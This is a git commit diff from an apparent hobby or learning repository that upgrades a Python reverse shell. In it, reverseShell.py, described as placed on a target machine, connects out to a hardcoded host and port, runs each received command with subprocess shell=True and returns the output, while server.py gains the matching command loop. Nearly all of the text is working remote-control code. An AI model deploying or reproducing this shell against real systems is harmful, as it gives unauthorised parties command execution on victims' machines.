Add remote command execution - server.py / Update README.md

SHathi28 · SHathi28 · commit ea10a7a71e15 · 2021-01-22T22:35:38.000-05:00
diff --git a/README.md b/README.md
@@ -70,4 +70,7 @@
    **server.py v1.1**: Upgrade of the script. Allows the script to connect to a remore system (in this case it's the local machine) and send and receive messages between the two programs.
 ![reverseShell Screenshot 2](README_Screenshots/reverseShell_Screenshot2.png)
 
+   **server.py v1.2**: Allows the script to now continusouly execute commands on the remote system and print the results to the console.
+![reverseShell Screenshot 3](README_Screenshots/reverseShell_Screenshot3.png)
 
+2. **reverseShell.py**: Works in conjunction with server.py. This script is designed to be placed on the target machine and establish a connection with the command system, waiting for command to execute and send back.
diff --git a/README_Screenshots/reverseShell_Screenshot3.png b/README_Screenshots/reverseShell_Screenshot3.png
diff --git a/Reverse_Shell_Scripts/reverseShell.py b/Reverse_Shell_Scripts/reverseShell.py
@@ -3,11 +3,17 @@
 # Date: 01/22/2021
 
 import socket
+import subprocess 
 
 def shell():
-    command = sock.recv(1024)
-    message = "You have successfully retrieved this message"
-    sock.send(message.encode())
+    while True:
+        command = sock.recv(1024)
+        if command.decode() == ':q':
+            break
+        else:
+            proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+            result = proc.stdout.read() + proc.stderr.read()
+            sock.send(result)
 
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 sock.connect(("192.168.7.125", 54321))
diff --git a/Reverse_Shell_Scripts/server.py b/Reverse_Shell_Scripts/server.py
@@ -4,13 +4,17 @@
 
 import socket
 from termcolor import colored
+import subprocess
 
 def shell():
-    command =input("Shell#~%s: " % str(ip))
-    target.send(command.encode())
-    message = target.recv(1024)
-    print(message.decode())
-
+    while True:
+        command = input("Shell#~%s: " % str(ip))
+        target.send(command.encode())
+        if command == ':q':
+            break
+        else:
+            result = target.recv(1024)
+            print(result.decode())
 
 def server():
     global sock
@@ -27,3 +31,4 @@ def server():
 
 server()
 shell()
+sock.close()
